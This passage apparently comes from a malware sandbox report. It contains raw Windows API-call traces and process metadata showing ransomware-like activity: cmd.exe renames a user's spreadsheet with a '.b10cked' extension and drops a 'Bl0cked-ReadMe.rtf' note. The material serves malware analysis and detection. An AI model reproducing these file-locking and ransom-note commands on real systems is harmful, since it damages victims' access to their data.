lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.571] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0130.571] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0130.571] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0130.571] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0130.571] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0130.571] _wcsicmp (_String1="move", _String2="CD") returned 10 [0130.571] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0130.571] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0130.571] _wcsicmp (_String1="move", _String2="REN") returned -5 [0130.571] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0130.571] _wcsicmp (_String1="move", _String2="SET") returned -6 [0130.571] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0130.571] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0130.571] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0130.571] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0130.571] _wcsicmp (_String1="move", _String2="MD") returned 11 [0130.571] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0130.571] _wcsicmp (_String1="move", _String2="RD") returned -5 [0130.571] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0130.571] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0130.571] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0130.571] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0130.571] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0130.571] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0130.572] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0130.572] _wcsicmp (_String1="move", _String2="VER") returned -9 [0130.572] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0130.572] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0130.572] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0130.572] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0130.572] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0130.572] _wcsicmp (_String1="move", _String2="START") returned -6 [0130.572] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0130.572] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0130.572] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0130.573] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0130.573] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0130.573] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f224, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f21c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f21c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0130.575] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0130.575] _wcsicmp (_String1="P939UI~1.XLS", _String2=".") returned 66 [0130.575] _wcsicmp (_String1="P939UI~1.XLS", _String2="..") returned 66 [0130.575] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939UI~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\p939ui~1.xls")) returned 0x20 [0130.575] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x311e88 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.575] SetErrorMode (uMode=0x0) returned 0x0 [0130.575] SetErrorMode (uMode=0x1) returned 0x0 [0130.575] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939UI~1.XLS", nBufferLength=0x104, lpBuffer=0x16ebac, lpFilePart=0x16eb94 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939UI~1.XLS", lpFilePart=0x16eb94*="P939UI~1.XLS") returned 0x2f [0130.575] SetErrorMode (uMode=0x0) returned 0x1 [0130.575] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1")) returned 0x10 [0130.576] _wcsicmp (_String1="P939UI~1.XLS", _String2=".") returned 66 [0130.576] _wcsicmp (_String1="P939UI~1.XLS", _String2="..") returned 66 [0130.576] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939UI~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\p939ui~1.xls")) returned 0x20 [0130.576] SetErrorMode (uMode=0x0) returned 0x0 [0130.576] SetErrorMode (uMode=0x1) returned 0x0 [0130.576] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939UI~1.XLS", nBufferLength=0x104, lpBuffer=0x16f028, lpFilePart=0x16edc0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939UI~1.XLS", lpFilePart=0x16edc0*="P939UI~1.XLS") returned 0x2f [0130.576] SetErrorMode (uMode=0x0) returned 0x1 [0130.576] SetErrorMode (uMode=0x0) returned 0x0 [0130.576] SetErrorMode (uMode=0x1) returned 0x0 [0130.576] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x16f230, lpFilePart=0x16edc0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx.b10cked", lpFilePart=0x16edc0*="P939uI0IUIKwHsX.xlsx.b10cked") returned 0x3f [0130.576] SetErrorMode (uMode=0x0) returned 0x1 [0130.576] SetLastError (dwErrCode=0x0) [0130.576] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\p939ui0iuikwhsx.xlsx.b10cked")) returned 0xffffffff [0130.576] GetLastError () returned 0x2 [0130.576] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939UI~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x16e73c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e73c) returned 0x300ee8 [0130.576] FindNextFileW (in: hFindFile=0x300ee8, lpFindFileData=0x16e73c | out: lpFindFileData=0x16e73c) returned 0 [0130.577] GetLastError () returned 0x12 [0130.577] FindClose (in: hFindFile=0x300ee8 | out: hFindFile=0x300ee8) returned 1 [0130.578] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939UI~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x311c28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x311c28) returned 0x300ee8 [0130.578] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x16e9d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx.b10cked", lpFilePart=0x0) returned 0x3f [0130.578] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx", nBufferLength=0x104, lpBuffer=0x16e9d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx", lpFilePart=0x0) returned 0x37 [0130.578] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\p939ui0iuikwhsx.xlsx")) returned 0x20 [0130.578] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\p939ui0iuikwhsx.xlsx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\p939ui0iuikwhsx.xlsx.b10cked"), dwFlags=0x3) returned 1 [0130.579] FindClose (in: hFindFile=0x300ee8 | out: hFindFile=0x300ee8) returned 1 [0130.579] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16e988 | out: _Buffer=" 1") returned 9 [0130.579] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.579] GetFileType (hFile=0x7) returned 0x2 [0130.727] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0130.727] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16e914 | out: lpMode=0x16e914) returned 1 [0130.727] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.727] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e948 | out: lpConsoleScreenBufferInfo=0x16e948) returned 1 [0130.727] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0130.728] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x16e988 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0130.728] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x16e96c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x16e96c*=0x1a) returned 1 [0130.728] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.728] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0130.728] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.728] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0130.728] _get_osfhandle (_FileHandle=0) returned 0x3 [0130.728] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0130.728] SetConsoleInputExeNameW () returned 0x1 [0130.728] GetConsoleOutputCP () returned 0x1b5 [0130.729] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0130.729] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.729] exit (_Code=0) Process: id = "100" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16920" os_pid = "0x828" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11578 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11579 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11580 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11581 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 11582 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11583 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11584 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11585 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11586 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 11587 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 11622 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11623 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11624 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11625 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 11626 start_va = 0x5d0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 11627 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 11628 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11629 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 11630 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11631 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11632 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11633 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 11634 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11635 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 11636 start_va = 0x3e0000 end_va = 0x4a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 11637 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11638 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 11639 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 11640 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 11641 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 11642 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 11643 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 11644 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 11645 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 157 os_tid = 0x838 [0130.602] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f954 | out: lpSystemTimeAsFileTime=0x22f954*(dwLowDateTime=0x87c7adc0, dwHighDateTime=0x1d440a9)) [0130.602] GetCurrentProcessId () returned 0x828 [0130.602] GetCurrentThreadId () returned 0x838 [0130.602] GetTickCount () returned 0x29b16 [0130.602] QueryPerformanceCounter (in: lpPerformanceCount=0x22f94c | out: lpPerformanceCount=0x22f94c*=18739153294) returned 1 [0130.603] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0130.603] __set_app_type (_Type=0x1) [0130.603] __p__fmode () returned 0x76b331f4 [0130.603] __p__commode () returned 0x76b331fc [0130.603] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0130.603] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0130.603] GetCurrentThreadId () returned 0x838 [0130.603] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x838) returned 0x38 [0130.603] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0130.603] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0130.603] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.603] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0130.604] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22f8e4 | out: phkResult=0x22f8e4*=0x0) returned 0x2 [0130.604] VirtualQuery (in: lpAddress=0x22f91b, lpBuffer=0x22f8b4, dwLength=0x1c | out: lpBuffer=0x22f8b4*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.604] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22f8b4, dwLength=0x1c | out: lpBuffer=0x22f8b4*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0130.604] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22f8b4, dwLength=0x1c | out: lpBuffer=0x22f8b4*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0130.604] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22f8b4, dwLength=0x1c | out: lpBuffer=0x22f8b4*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.604] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22f8b4, dwLength=0x1c | out: lpBuffer=0x22f8b4*(BaseAddress=0x230000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xb0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0130.604] GetConsoleOutputCP () returned 0x1b5 [0130.604] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0130.604] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0130.604] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.604] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0130.604] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.604] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0130.604] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.604] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0130.604] _get_osfhandle (_FileHandle=0) returned 0x3 [0130.604] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0130.605] _get_osfhandle (_FileHandle=0) returned 0x3 [0130.605] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0130.605] GetEnvironmentStringsW () returned 0x2f0188* [0130.605] FreeEnvironmentStringsW (penv=0x2f0188) returned 1 [0130.605] GetEnvironmentStringsW () returned 0x2f0188* [0130.605] FreeEnvironmentStringsW (penv=0x2f0188) returned 1 [0130.605] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e854 | out: phkResult=0x22e854*=0x40) returned 0x0 [0130.605] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e85c, lpData=0x22e860, lpcbData=0x22e858*=0x1000 | out: lpType=0x22e85c*=0x0, lpData=0x22e860*=0xb0, lpcbData=0x22e858*=0x1000) returned 0x2 [0130.605] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e85c, lpData=0x22e860, lpcbData=0x22e858*=0x1000 | out: lpType=0x22e85c*=0x4, lpData=0x22e860*=0x1, lpcbData=0x22e858*=0x4) returned 0x0 [0130.605] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e85c, lpData=0x22e860, lpcbData=0x22e858*=0x1000 | out: lpType=0x22e85c*=0x0, lpData=0x22e860*=0x1, lpcbData=0x22e858*=0x1000) returned 0x2 [0130.605] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e85c, lpData=0x22e860, lpcbData=0x22e858*=0x1000 | out: lpType=0x22e85c*=0x4, lpData=0x22e860*=0x0, lpcbData=0x22e858*=0x4) returned 0x0 [0130.605] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e85c, lpData=0x22e860, lpcbData=0x22e858*=0x1000 | out: lpType=0x22e85c*=0x4, lpData=0x22e860*=0x40, lpcbData=0x22e858*=0x4) returned 0x0 [0130.605] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e85c, lpData=0x22e860, lpcbData=0x22e858*=0x1000 | out: lpType=0x22e85c*=0x4, lpData=0x22e860*=0x40, lpcbData=0x22e858*=0x4) returned 0x0 [0130.605] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e85c, lpData=0x22e860, lpcbData=0x22e858*=0x1000 | out: lpType=0x22e85c*=0x0, lpData=0x22e860*=0x40, lpcbData=0x22e858*=0x1000) returned 0x2 [0130.605] RegCloseKey (hKey=0x40) returned 0x0 [0130.606] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e854 | out: phkResult=0x22e854*=0x40) returned 0x0 [0130.606] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e85c, lpData=0x22e860, lpcbData=0x22e858*=0x1000 | out: lpType=0x22e85c*=0x0, lpData=0x22e860*=0x40, lpcbData=0x22e858*=0x1000) returned 0x2 [0130.606] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e85c, lpData=0x22e860, lpcbData=0x22e858*=0x1000 | out: lpType=0x22e85c*=0x4, lpData=0x22e860*=0x1, 